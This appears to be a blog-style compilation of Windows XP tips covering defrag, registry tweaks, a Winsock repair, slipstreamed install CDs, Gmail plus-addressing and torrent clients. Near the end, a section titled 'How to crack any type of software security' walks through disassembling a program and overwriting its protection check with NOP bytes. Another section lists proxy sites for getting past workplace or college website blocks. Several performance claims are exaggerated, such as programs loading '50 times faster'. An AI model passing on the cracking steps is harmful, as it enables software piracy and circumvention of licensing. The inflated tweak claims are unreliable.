defragment xp

Application and Boot file Defrag

This type of defrag pushes all commonly used programs and boot files to the edge of the hard drive for faster access. Windows XP normally schedules this every three days when it is idle, however you can force it to do this by useing the b switch anytime

i.e defrag c: -b

decrease your application start up time

By default, Microsoft includes the /prefetch:1 switch to speed up it's Windows Media Player application start time. This switch can be used for other Windows applications and also many third party programs.

Example #1

You have AOL 8.0 installed on the computer. Complete the steps outlined bewlo to add the /prefetch:1 switch to AOL's Target path.

1. Right click on the AOL shortcut and select properties from the menu.

2. In the Target: Field add the /prefetch:1 switch to the very end of the path, like this: "C:\Program Files\America Online 8.0\aol.exe" /prefetch:1 and then click ok.

Now start AOL. It would load at least 50 times faster than ever before.

Example #2

1, Go to the Start button/All Programs/Accessories/System Tools

2. Right click on System Restore and select properties from the menu that appears. Add the /prefetch:1 to the Target Path entry so it looks like this %ystemRoot%\System32\restore\rstrui.exe /prefetch:1 and click ok.

Now System Restore will start immediately when executed.

Note: This switch will only work with some programs. Others will return a message saying the program in the target box is invalid. Just remove the switch

win xp bootable cd

How to create a bootable Windows XP SP1 CD (Nero):

Step 1

Create 3 folders - C:\WINXPSP1, C:\SP1106 and C:\XPBOOT

Step 2

Copy the entire Windows XP CD into folder C:\WINXPSP1

Step 3

You will have to download the SP1 Update, which is 133MB.
Rename the Service Pack file to XP-SP1.EXE
Extract the Service Pack from the Run Dialog using the command:
C:\XP-SP1.EXE -U -X:C:\SP1106

Step 4

Open Start/Run... and type the command:
C:\SP1106\update\update.exe -s:C:\WINXPSP1

Click OK

Folder C:\WINXPSP1 contains: Windows XP SP1



How to Create a Windows XP SP1 CD Bootable

Step 1

Download xpboot.zip
Code:
Code:
http://thro.port5.com/xpboot.zip

( no download manager !! )

Extract xpboot.zip file (xpboot.bin) in to the folder C:\XPBOOT

Step 2

Start Nero - Burning Rom.
Select File > New... from the menu.
1.) Select CD-ROM (Boot)
2.) Select Image file from Source of boot image data
3.) Set Kind of emulation: to No Emulation
4.) Set Load segment of sectors (hex!): to 07C0
5.) Set Number of loaded sectors: to 4
6.) Press the Browse... button



Step 3

Select All Files (*.*) from File of type:
Locate boot.bin in the folder C:\XPBOOT

Step 4

Click ISO tab
Set File-/Directory length to ISO Level 1 (Max. of 11 = 8 + 3 chars)
Set Format to Mode 1
Set Character Set to ISO 9660
Check all Relax ISO Restrictions




Step 5

Click Label Tab
Select ISO9660 from the drop down box.
Enter the Volume Label as WB2PFRE_EN
Enter the System Identifier as WB2PFRE_EN
Enter the Volume Set as WB2PFRE_EN
Enter the Publisher as MICROSOFT CORPORATION
Enter the Data Preparer as MICROSOFT CORPORATION
Enter the Application as WB2PFRE_EN

* For Windows XP Professional OEM substitute WB2PFRE_EN with WXPOEM_EN
* For Windows XP Home OEM substitute WB2PFRE_EN with WXHOEM_EN

Step 6

Click Burn tab
Check Write
Check Finalize CD (No further writing possible!)
Set Write Method to Disk-At-Once

Press New button

Step 7

Locate the folder C:\WINXPSP1
Select everything in the folder and drag it to the ISO compilation panel.
Click the Write CD Dialog button.

Press Write

You're done.

win xp system response reboot without rebooting

Have you ever been using your computer and your system sudddenly stops responding in ways like it if you try to open something it just hangs? One time I tried deleting a folder and it said it was in use, but it really wasn't. If this ever happens to you, you can follow these simple steps to 'reboot' your computer without 'rebooting' it.

Press CRTL + ALT + DEL

Goto the 'processes' tab and click explorer.exe once and then click 'end process'.

Now, click File > New Task and type explorer.exe

Everything should be fine now! If the problem is major, I would recomend actually shutting down then starting up again.

Winxp Tips And Tricks, Winsock 2 repair

Repairing Damaged Winsock2

The symptoms when Winsock2 is damaged show when you try to release and renew the IP address using IPCONFIG...

And you get the following error message:

An error occurred while renewing interface 'Internet': An operation was attempted on something that is not a socket.

Also Internet Explorer may give the following error message:
The page cannot be displayed Additionally, you may have no IP address or no Automatic Private IP Addressing (APIPA) address, and you may be receiving IP packets but not sending them.

There are two easy ways to determine if Winsock2 is damaged:

From the XP source files, go to the Support / Tools directory

Winsock Test Method 1
Run netdiag /test:winsock

The end should say Winsock test ..... passed

Winsock Test Method 2

Run Msinfo32
Click on the + by Components
Click on the by Network
Click on Protocol
There should be 10 sections if the Winsock2 key is ok
MSAFD Tcpip [TCP/IP]
MSAFD Tcpip [UDP/IP]
RSVP UDP Service Provider
RSVP TCP Service Provider
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...
MSAFD NetBIOS [\Device\NetBT_Tcpip...

If the names are anything different from those in this list, then likely Winsock2 is corrupted and needs to be repaired.
If you have any 3rd party software installed, the name MSAFD may be changed.
There should be no fewer than 10 sections.

To repair Winsock2

Run Regedit
Delete the following two registry keys:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2

Restart the computer
Go to Network Connections
Right click and select Properties
Click on the Install button
Select Protocol
Click on the Add button
Click on the Have Disk button
Browse to the \Windows\inf directory
Click on the Open button
Click on the OK button
Highlight Internet Protocol (TCP/IP)
Click on the OK button
Reboot

Xp Folder View Does Not Stay To You're Setting

Grab your registry editor and join in

Why Doesn't Windows Remember My Folder View Settings?

If you've changed the view settings for a folder, but Windows "forgets" the settings when you open the folder again, or if Windows doesn't seem to remember the size or position of your folder window when you reopen it, this could be caused by the default limitation on storing view settings data in the registry; by default Windows only remembers settings for a total of 200 local folders and 200 network folders.

To work around this problem, create a BagMRU Size DWORD value in both of the following registry keys, and then set the value data for both values to the number of folders that you want Windows to remember the settings for. For example, for Windows to remember the settings for 5000 local folders and 5000 network folders, set both values to 5000.

Here is how:

Follow these steps, and then quit Registry Editor:
1. Click Start, click Run, type regedit, and then click OK.
2. Locate and then click the following key in the registry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell
3. On the Edit menu, point to New, and then click DWORD Value.
4. Type BagMRU Size, and then press ENTER.
5. On the Edit menu, click Modify.
6. Type 5000, and then click OK.

AND:

1. Locate and then click the following key in the registry:
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam
2. On the Edit menu, point to New, and then click DWORD Value.
3. Type BagMRU Size, and then press ENTER.
4. On the Edit menu, click Modify.
5. Type 5000, and then click OK.

Note:

When you use roaming user profiles, registry information is copied to a server when you log off and copied to your local computer when you log on. Therefore, you may have performance issues if you increase the BagMRU Size values for roaming user profiles.

XP Repair install

1. Boot the computer using the XP CD. You may need to change the
boot order in the system BIOS. Check your system documentation
for steps to access the BIOS and change the boot order.


2. When you see the "Welcome To Setup" screen, you will see the
options below This portion of the Setup program prepares Microsoft
Windows XP to run on your computer:

To setup Windows XP now, press ENTER.

To repair a Windows XP installation using Recovery Console, press R.

To quit Setup without installing Windows XP, press F3.




3. Press Enter to start the Windows Setup.

do not choose "To repair a Windows XP installation using the
Recovery Console, press R", (you do not want to load Recovery
Console). I repeat, do not choose "To repair a Windows XP
installation using the Recovery Console, press R".

4. Accept the License Agreement and Windows will search for existing
Windows installations.

5. Select the XP installation you want to repair from the list and
press R to start the repair. If Repair is not one of the options,
read this Warning!!

6. Setup will copy the necessary files to the hard drive and reboot.
Do not press any key to boot from CD when the message appears.
Setup will continue as if it were doing a clean install, but your
applications and settings will remain intact.

Blaster worm warning: Do not immediately activate over the internet
when asked, enable the XP firewall
[ http://support.microsoft.com/?kbid=283673 ]
before connecting to the internet. You can activate after the
firewall is enabled. Control Panel - Network Connections. Right click
the connection you use, Properties, and there is a check box on the
Advanced [ http://michaelstevenstech.com/xpfirewall1.jpg ] page.


7. Reapply updates or service packs applied since initial Windows XP
installation. Please note that a Repair Install from the Original
install XP CD will remove SP1/SP2 and service packs will need to be
reapplied.
Service Pack 2
http://www.microsoft.com/downloads/details.aspx?FamilyId=049C9DBE-3B8E-
4F30-8245-9E368D3CDB5A&displaylang=en
An option I highly recommend is creating a Slipstreamed XP CD with SP2.
Slipstreaming Windows XP with Service Pack 2 (SP2)
http://www.winsupersite.com/showcase/windowsxp_sp2_slipstream.asp

______________________________________________________________________

Warning!!
If the option to Repair Install is not available and you continue
with the install;you will delete your Windows folder and Documents
and Settings folder. All applications that place keys in the registry
will need to be re-installed. You should exit setup if the repair
option is not available and consider other options.

Try the link below if the repair option is not available.
Windows XP Crashed?
http://www.digitalwebcast.com/2002/03_mar/tutorials/cw_boot_toot.htm
Here's Help.
A salvage mission into the depths of Windows XP, explained by a
non-geek

by Charlie White
http://www.digitalwebcast.com/2002/03_mar/tutorials/cw_boot_toot.htm

Related links
You May Lose Data or Program Settings After Reinstalling, Repairing,
or Upgrading Windows XP (Q312369)
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q312369

System Restore "Restore Points" Are Missing or Deleted (Q301224)
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q301224

How to Perform an In-Place Upgrade (Reinstallation) of Windows XP
(Q315341)
http://support.microsoft.com/search/preview.aspx?scid=kb;en-us;Q315341

Warning!! If the Repair Option is not Available
What should I do? Most important do not ignore the information below!

If the option to Repair Install is NOT available and you continue
with the install; you will delete your Windows folder, Documents and
Settings folders. All Applications that place keys in the registry
will need to be re-installed.

You should exit setup if the repair option is not available and
consider other options. I have found if the Repair option is not
available, XP is usually not repairable and will require a Clean
install.http://michaelstevenstech.com/cleanxpinstall.html
If you still have the ability to access the Windows XP installation,
backup all important files not restorable from other sources before
attempting any recovery console trouble shooting attempts.

Possible Fix by reconfiguring boot.ini using Recovery Console.
1.Boot with XP CD or 6 floppy boot disk set.
2. Press R to load the Recovery Console.
3. Type bootcfg.
4. This should fix any boot.ini errors causing setup not to see the
XP OS install.
5. Try the repair install.

One more suggestion from MVP Alex Nichol

"Reboot, this time taking the immediate R option, and if the CD
letter is say K: give these commands

COPY K:\i386\ntldr C:\
COPY K:\i386\ntdetect.com C:\


(two other files needed - just in case)

1. Type: ATTRIB -H -R -S C:\boot.ini DEL C:\boot.ini

2. Type: BootCfg /Rebuild

which will get rid of any damaged boot.ini, search the disk for
systems and make a new one. This might even result in a damaged
windows reappearing; but gives another chance of getting at the
repair"


Feedback on success or failure of the above fixes would be greatly
appreciated.



Feedback on success or failure of the above fix would be greatly
appreciated.
xpnews@michaelstevenstech.com

Your homepage never being changed

Some websites illegally modify your registry editor and set their website as default home page, for stop this,

1. Right-click on the Internet Explorer icon on your desktop and select "Properties".

2. In the "Target" box you will see "C:\Program Files\Internet

Explorer\IEXPLORE.EXE".

3. Now by adding the URL of the site to the end of this it overrides any
Homepage setting in internet options:

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" www.shareordie.com

Unlock toolbar to work with them

A toolbar is a collection of buttons or icons—usually displayed across the top of the screen—that represents the different tasks you can do within a program. For example, in Microsoft Internet Explorer, there is a toolbar for the standard Internet Explorer command buttons, one for entering an Internet address, and one for quick links you can set up.

When you open a toolbar, it will appear in a particular spot on the screen. If you want to change the location of the toolbar you can move it by dragging it to the new location. You can also resize the toolbar by dragging its edge. If you find a toolbar that cannot be moved or resized, the toolbar may be locked.

To unlock a toolbar

1.


Make sure you have only one window open for the program. (You can look at the taskbar at the bottom of your screen to verify this.) Then, right-click the toolbar.

2.


If Lock the Toolbars appears on the shortcut menu and is selected (a check mark appears to the left of it), click Lock the Toolbars to unlock the toolbar. If you see Lock the Toolbars, but no check mark appears to the left of it, the toolbar is already unlocked.

Note: If Lock the Toolbars does not appear on the shortcut menu, you may not be able to move or resize the toolbar.

If you are able move the toolbar, once you’ve moved the toolbar to the location where you want it, select Lock the Toolbars so that it isn’t inadvertently moved. To make sure the change is permanent, lock the toolbar, exit the program, and then reopen it. The toolbar should be locked.

Toolbar shortcut menu with Lock the Toolbars selected

Win Xp tweaks

-----------
STARTUP
-----------


Windows Prefetcher
******************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ Memory Management \ PrefetchParameters]

Under this key there is a setting called EnablePrefetcher, the default setting of which is 3. Increasing this number to 5 gives the prefetcher system more system resources to prefetch application data for faster load times. Depending on the number of boot processes you run on your computer, you may get benefits from settings up to 9. However, I do not have any substantive research data on settings above 5 so I cannot verify the benefits of a higher setting. This setting also may effect the loading times of your most frequently launched applications. This setting will not take effect until after you reboot your system.


Master File Table Zone Reservation
**********************************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ FileSystem]

Under this key there is a setting called NtfsMftZoneReservation, the default setting of which is 1. The range of this value is from 1 to 4. The default setting reserves one-eighth of the volume for the MFT. A setting of 2 reserves one-quarter of the volume for the MFT. A setting of 3 for NtfsMftZoneReservation reserves three-eighths of the volume for the MFT and setting it to 4 reserves half of the volume for the MFT. Most users will never exceed one-quarter of the volume. I recommend a setting of 2 for most users. This allows for a "moderate number of files" commensurate with the number of small files included in most computer games and applications. Reboot after applying this tweak.


Optimize Boot Files
*******************
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Dfrg \ BootOptimizeFunction]

Under this key is a text value named Enable. A value of Y for this setting enables the boot files defragmenter. This setting defragments the boot files and may move the boot files to the beginning (fastest) part of the partition, but that last statement is unverified. Reboot after applying this tweak.

Optimizing Startup Programs [msconfig]
**************************************

MSConfig, similar to the application included in Win9x of the same name, allows the user to fine tune the applications that are launched at startup without forcing the user to delve deep into the registry. To disable some of the applications launched, load msconfig.exe from the run command line, and go to the Startup tab. From there, un-ticking the checkbox next to a startup item will stop it from launching. There are a few application that you will never want to disable (ctfmon comes to mind), but for the most part the best settings vary greatly from system to system.

As a good rule of thumb, though, it is unlikely that you will want to disable anything in the Windows directory (unless it's a third-party program that was incorrectly installed into the Windows directory), nor will you want to disable anything directly relating to your system hardware. The only exception to this is when you are dealing with software, which does not give you any added benefits (some OEM dealers load your system up with software you do not need). The nice part of msconfig is that it does not delete any of the settings, it simply disables them, and so you can go back and restart a startup application if you find that you need it. This optimization won't take effect until after a reboot.

Bootvis Application
*******************
The program was designed by Microsoft to enable Windows XP to cold boot in 30 seconds, return from hibernation in 20 seconds, and return from standby in 10 seconds. Bootvis has two extremely useful features. First, it can be used to optimize the boot process on your computer automatically. Second, it can be used to analyze the boot process for specific subsystems that are having difficulty loading. The first process specifically targets the prefetching subsystem, as well as the layout of boot files on the disk. When both of these systems are optimized, it can result in a significant reduction in the time it takes for the computer to boot.

Before attempting to use Bootvis to analyze or optimize the boot performance of your system, make sure that the task scheduler service has been enabled – the program requires the service to run properly. Also, close all open programs as well – using the software requires a reboot.

To use the software to optimize your system startup, first start with a full analysis of a fresh boot. Start Bootvis, go to the Tools menu, and select next boot. Set the Trace Repetition Settings to 2 repetitions, Start at 1, and Reboot automatically. Then set the trace into motion. The system will fully reboot twice, and then reopen bootvis and open the second trace file (should have _2 in the name). Analyze the graphs and make any changes that you think are necessary (this is a great tool for determining which startup programs you want to kill using msconfig). Once you have made your optimizations go to the Trace menu, and select the Optimize System item. This will cause the system to reboot and will then make some changes to the file structure on the hard drive (this includes a defragmentation of boot files and a shifting of their location to the fastest portion of the hard disk, as well as some other optimizations). After this is done, once again run a Trace analysis as above, except change the starting number to 3. Once the system has rebooted both times, compare the charts from the second trace to the charts for the fourth trace to show you the time improvement of the system's boot up.

The standard defragmenter included with Windows XP will not undo the boot optimizations performed by this application.



-----------------------------------
General Performance Tweaks
-----------------------------------


IRQ Priority Tweak
******************
[HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \ PriorityControl]

You will need to create a new DWORD: IRQ#Priority (where # is the number of the IRQ you want to prioritize) and give it a setting of 1. This setting gives the requisite IRQ channel priority over the other IRQs on a software level. This can be extremely important for functions and hardware subsystems that need real-time access to other parts of the system. There are several different subsystems that might benefit from this tweak. Generally, I recommend giving either the System CMOS or the video card priority. The System CMOS generally has an IRQ setting of 8, and giving it priority enhances the I/O performance of the system. Giving priority to the video card can increase frame rates and make AGP more effective.

You can give several IRQs priority, but I am not entirely certain how the system interacts when several IRQs are given priority – it may cause random instabilities in the system, although it is more likely that there's a parsing system built into Windows XP to handle such an occurrence. Either way, I would not recommend it.

QoS tweak
*********
QoS (Quality of Service) is a networking subsystem which is supposed to insure that the network runs properly. The problem with the system is that it eats up 20% of the total bandwidth of any networking service on the computer (including your internet connection). If you are running XP Professional, you can disable the bandwidth quota reserved for the system using the Group Policy Editor [gpedit.msc].

You can run the group policy editor from the Run command line. To find the setting, expand "Local Computer Policy" and go to "Administrative Templates" under "Computer Configuration." Then find the "Network" branch and select "QoS Packet Scheduler." In the right hand box, double click on the "Limit Reservable Bandwidth." From within the Settings tab, enable the setting and then go into the "Bandwidth Limit %" and set it to 0%. The reason for this is that if you disable this setting, the computer defaults to 20%. This is true even when you aren't using QoS.

Free Idle Tasks Tweak
*********************

This tweak will free up processing time from any idle processes and allow it to be used by the foreground application. It is useful particularly if you are running a game or other 3D application. Create a new shortcut to "Rundll32.exe advapi32.dll,ProcessIdleTasks" and place it on your desktop. Double-click on it anytime you need all of your processing power, before opening the application.

Windows Indexing Services
Windows Indexing Services creates a searchable database that makes system searches for words and files progress much faster – however, it takes an enormous amount of hard drive space as well as a significant amount of extra CPU cycles to maintain the system. Most users will want to disable this service to release the resources for use by the system. To turn off indexing, open My Computer and right click on the drive on which you wish to disable the Indexing Service. Enter the drive's properties and under the general tab, untick the box for "Allow the Indexing Service to index this disk for fast file searching."

Priority Tweak
**************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ PriorityControl]

This setting effectively runs each instance of an application in its own process for significantly faster application performance and greater stability. This is extremely useful for users with stability problems, as it can isolate specific instances of a program so as not to bring down the entire application. And, it is particularly useful for users of Internet Explorer, for if a rogue web page crashes your browser window, it does not bring the other browser windows down with it. It has a similar effect on any software package where multiple instances might be running at once, such as Microsoft Word. The only problem is that this takes up significantly more memory, because such instances of a program cannot share information that is in active memory (many DLLs and such will have to be loaded into memory multiple times). Because of this, it is not recommended for anyone with less than 512 MB of RAM, unless they are running beta software (or have some other reason for needing the added stability).

There are two parts to this tweak. First is to optimize XP's priority control for the processes. Browse to HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ PriorityControl and set the "Win32PrioritySeparation" DWORD to 38. Next, go into My Computer and under Tools, open the Folder Options menu. Select the View tab and check the "Launch folder windows in separate process" box. This setting actually forces each window into its own memory tread and gives it a separate process priority.

Powertweak application
**********************
xxx.powertweak.com

Powertweak is an application, which acts much like a driver for our chipsets. It optimizes the communication between the chipset and the CPU, and unlocks several "hidden" features of the chipset that can increase the speed of the system. Specifically, it tweaks the internal registers of the chipset and processor that the BIOS does not for better communication performance between subsystems. Supported CPUs and chipsets can see a significant increase in I/O bandwidth, increasing the speed of the entire system. Currently the application supports most popular CPUs and chipsets, although you will need to check the website for your specific processor/chipset combo – the programmer is working on integrating even more chipsets and CPUs into the software.

Offload Network Task Processing onto the Network Card
*****************************************************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip \ Parameters]

Many newer network cards have the ability of taking some of the network processing load off of the processor and performing it right on the card (much like Hardware T&L on most new video cards). This can significantly lower the CPU processes needed to maintain a network connection, freeing up that processor time for other tasks. This does not work on all cards, and it can cause network connectivity problems on systems where the service is enabled but unsupported, so please check with your NIC manufacturer prior to enabling this tweak. Find the DWORD "DisableTaskOffload" and set the value to 0 (the default value is 1). If the key is not already available, create it.

Force XP to Unload DLLs
***********************
[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer]
"AlwaysUnloadDLL"=dword:00000001

XP has a bad habit of keeping dynamic link libraries that are no longer in use resident in memory. Not only do the DLLs use up precious memory space, but they also tend to cause stability problems in some systems. To force XP to unload any DLLs in memory when the application that called them is no longer in memory, browse to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer and find the DWORD "AlwaysUnloadDLL". You may need to create this key. Set the value to 1 to force the operating system to unload DLLs.

Give 16-bit apps their own separate processes
*********************************************
[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ WOW]
"DefaultSeparateVDM"="Yes"

By default, Windows XP will only open one 16-bit process and cram all 16-bit apps running on the system at a given time into that process. This simulates how MS-DOS based systems viewed systems and is necessary for some older applications that run together and share resources. However, most 16-bit applications work perfectly well by themselves and would benefit from the added performance and stability of their own dedicated resources. To force Windows XP to give each 16-bit application it's own resources, browse to HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ WOW and find the String "DefaultSeparateVDM". If it is not there, you may need to create it. Set the value of this to Yes to give each 16-bit application its own process, and No to have the 16-bit application all run in the same memory space.

Disable User Tracking
*********************
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer]
"NoInstrumentation"=dword:00000001

The user tracking system built into Windows XP is useless to 99% of users (there are very few uses for the information collected other than for a very nosy system admin), and it uses up precious resources to boot, so it makes sense to disable this "feature" of Windows XP. To do so, browse to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer and find the DWORD "NoInstrumentation". You may need to create this key if it is not there. The default setting is 0, but setting it to 1 will disable most of the user tracking features of the system.

Thumbnail Cache
***************
[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced]
"DisableThumbnailCache"=dword:00000001

Windows XP has a neat feature for graphic and video files that creates a "thumbnail" of the image or first frame of the video and makes it into an oversized icon for the file. There are two ways that Explorer can do this, it can create them fresh each time you access the folder or it can load them from a thumbnail cache. The thumbnail caches on systems with a large number of image and video files can become staggeringly large. To disable the Thumbnail Cache, browse to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced and find the DWORD "DisableThumbnailCache". You may need to create this key. A setting of 1 is recommended for systems where the number of graphic and video files is large, and a setting of 0 is recommended for systems not concerned about hard drive space, as loading the files from the cache is significantly quicker than creating them from scratch each time a folder is accessed.

How to Auto Delete %temp% file

what i prefer is %temp% " without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..


First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.

5 Useful xp tricks

The Windows XP start menu
The Windows XP start menu is one of the most important menus in Windows. But is seems to have a mind of its own.

Don't you agree that YOU should decide what goes on this menu ?

The Most Frequently Used (MFU) list
Did you notice that it has a "most frequently used" list ? This list keeps track of how often programs are used. It is the portion of the start menu between "All Programs" and the horizontal line under the "pinned" items.

The population of your MFU list may seem strange at times. Maybe you see programs that you haven't used in ages. Maybe you don't see programs that you'd expect to see. And even if the content seems logical, the list "lives", so you can never count on a program to be there.

To make the content of the start menu more reliable, it may be a good idea to decrease the size of the MFU list a bit and make more room for the "pinned" list.

The programs, documents, web sites, ... that you put on the pinned list are there to stay. Once you put them there, you can count on them to be there. Your default web browser and e-mail program are on the pinned list by default, but you can remove them if you want.

How to put a program on the pinned list ?
Click on the start button and navigate to the program that you want on the pinned list
Right-click this program and select "Pin to Start menu"



A document that you use often on the pinned list ?
Open Windows Explorer, navigate to that document, right-click and drag that document to the Start button and release the right mouse button when your mouse pointer is on the Start button.

An often visited web site on the pinned list ?
Fire up your web browser and make sure that it's not maximized so that you can also see some of your desktop
Go to the web page that you want to pin to the start menu
click and hold the pictogram next to the url in the address bar and drag the icon to your desktop



The icon that you need to drag to your desktop

Windows puts a shortcut on your desktop. Click this shortcut and drag it to your start button. The shortcut is now on your pinned list and you can safely remove it from your desktop to tidy up.

More room for the pinned listIf you put too many icons on your Windows XP Start menu pinned list, Windows may start to worry about the start menu real estate and bug you with messages. By decreasing the number of items on the "most frequently used" list, you make more room available for the pinned list.

.Right-click the start button
.Select properties
.Click the tab "Start Menu"
.Click the button "Customize"
.In the "Programs" section, decrease the "Number of programs on Start menu"
.You might also want to select the radio button "Small icons" in this dialog to have more space on the Start menu
.Click ok
.Click ok once more

Open orkut in blocked PC's

hi friends u can open any types of websites from following links if it banned..
enjoy

*www.mathtunnel.com
*www.gravitywars.com
*www.kproxy.com
*www.calculatepie.com
*http://www.anonymizer.com/

Open the above sites and just type in http://www.orkut.com in companies or colleges where its blocked n enjoy

Use gmail generate unlimited E-mail address

Gmail has an interesting quirk where you can add a plus sign (+) after your Gmail address, and it'll still get to your inbox. It's called plus-addressing, and it essentially gives you an unlimited number of e-mail addresses to play with. Here's how it works: say your address is pinkyrocks@gmail.com, and you want to automatically label all work e-mails. Add a plus sign and a phrase to make it pinkyrocks+work@gmail.com and set up a filter to label it work (to access your filters go to Settings->Filters and create a filter for messages addressed to pinkyrocks+work@gmail.com. Then add the label work).

More real world examples:

Find out who is spamming you: Be sure to use plus-addressing for every form you fill out online and give each site a different plus address.

Example: You could use
pinkyrocks+nytimes@gmail.com for nytimes.com
pinkyrocks+freestuff@gmail.com for freestuff.com
Then you can tell which site has given your e-mail address to spammers, and automatically send them to the trash.

Automatically label your incoming mail: I've talked about that above.

Archive your mail: If you receive periodic updates about your bank account balance or are subscribed to a lot of mailing lists that you don't check often, then you can send that sort of mail to the archives and bypass your Inbox.

Example: For the mailing list, you could give pinkyrocks+mailinglist1@gmail.com as your address, and assign a filter that will archive mail to that address automatically. Then you can just check in once in a while on the archive if you want to catch up.

Update (9/7): Several commentors have indicated that this is not a Gmail specific trick. kl says Fastmail has enabled this feature as well. caliban10 reports that a lot of sites reject addresses with a plus sign. You might use other services like Mailinator for disposable addresses instead. pbinder recommends using services like SpamGourmet, which redirects mail to your real address.

Prevent Pendrive virus

Prevent PenDrive Virus
:: Do the following ::

1) Disable autorun/autoplay function of your pen drive.

2) Now plugin your pen drive and open any folder of your computer.
(Do not open any folder from ur pen drive.)

3) Now goto tools then select Folder Option
In that box mark the Show Hidden Files & Folders option.
Also Uncheck Hide Extension for known file types & Hide Protected OS files.

Now click apply and ok buttons and close that folder.

4) Nome come to desktop.
On the Desktop, click on windows Start button and select Search for files & folders.

When the search dialog box appears on the screen, in that click on All Files & Folders, now click on More Advanced Options then select search Hidden files & folders.


Now go above & in Look In option, select your pendrive letter (For example E: Or G:)
and hit Enter.

5) Now if you see any unknown .Exefiles, simply delete them all.

How to crack any type of software security

Softwares you need : - W32Dasm and HIEW

Identifying the protection : ====>>>>

Run the program, game, etc., (SoftwareX) that you want to crack without the CD in the CD reader. SoftwareX will not run of course, however, when the error window pops up it will give you all of the vital information that you need to crack the program, so be sure to

write down what it says.

Cracking the Protection : ====>>>>

Now, run Win32Dasm. On the file menu open DISASSEMBLER > OPEN FILE TO DISASSEMBLE. Select SoftwareX’s executable file in the popup window that will appear (e.g. SoftwareX.exe). W32Dasm may take several minutes to disassemble the file.

When W32Dasm finishes disassembling the file it will display unrecognizable text; this is what we want. Click on the String Data References button. Scroll through the String Data Items until you find SoftwareX’s error message. When you locate it, double click the

error message and then close the window to return to the Win32Dasm text. You will notice that you have been moved somewhere within the SoftwareX’s check routine; this is where the error message in generated.

Now comes the difficult part, so be careful. To crack SoftwareX’s protection you must know the @offset of every call and jump command. Write down every call and jump @offset number that you see (You have to be sure, that the OPBAR change its used color to green). You need the number behind the @offset without the “h.”

Now open HIEW, locate SoftwareX’s executable, and press the F4 key. At this point a popup window will appear with 3 options: Text, Hex, and Decode. Click on “Decode” to see a list of numbers. Now press the F5 key and enter the number that was extracted using Win32Dasm. After you have entered the number you will be taken to SoftwareX’s check routine within HIEW.

To continue you must understand this paragraph. If the command that you are taken to is E92BF9BF74, for example, it means that the command equals 5 bytes. Every 2 digits equal one byte: E9-2B-F9-BF-74 => 10 digits => 5 bytes.

If you understood this then you can continue.

Press F3 (Edit), this will allow you to edit the 10 digits. Replace the 5 bytes with the digits 90. In other words, E92BF9BF74 will become 9090909090 (90-90-90-90-90). After you complete this step press the F10 key to exit.

=====>>>>>Congratulations! You just cracked SoftwareX!<<<<<=====

The 13 best torrnet downloader

torrent Acquisition is torrent client, which allows to share files with tens of millions of Mac and Windows users around the planet. Requirements: Mac OS X 10.4 Tiger.

Opera is the fastest, and most secure free Web browser available. You don’t need a separate BitTorrent application to download large files. Simply click a torrent link and start the download.

Arctic Torrent is an Open Source minimal BitTorrent client. It won’t have all the pretty features that other Torrent apps have, but focuses on low memory and cpu usage. Because it was written in C++, you dont get the high memory requirements of Java or high CPU usage of Python. Arctic is tested on Windows XP and should work on 2000, XP, and 2003 in 32-bit and 64-bit. It uses Unicode and thus will not run on Windows 9x.

Azureus implements the BitTorrent protocol using java language and comes bundled with many invaluable features for both beginners and advanced users. Runs on all operating systems.

BitComet is a BitTorrent/HTTP/FTP download management software, which is powerful, fast, very easy-to-use, and completely free. It contains many advanced features for BitTorrent download and extends its leading BitTorrent technology to HTTP/FTP to accelerate downloading up to 5 - 10 times faster, or more. Runs on Windows 2000/XP/2003/Vista. Windows 98/Me can use the ZIP version.

Torrent Swapper is an open source sociable peer to peer file-sharing client based on the Bittorrent protocol that is ideal for high-speed distribution of large files that has a basic understanding of human friendships, of user tastes in content, and of Internet connectivity between users. Torrent Swapper supports simultaneous downloads, download queue, selected downloads in torrent package, fast-resume, disk cache, speed limits, port mapping, proxy, ip-filter, etc. Works with Linux, OS X and Windows.

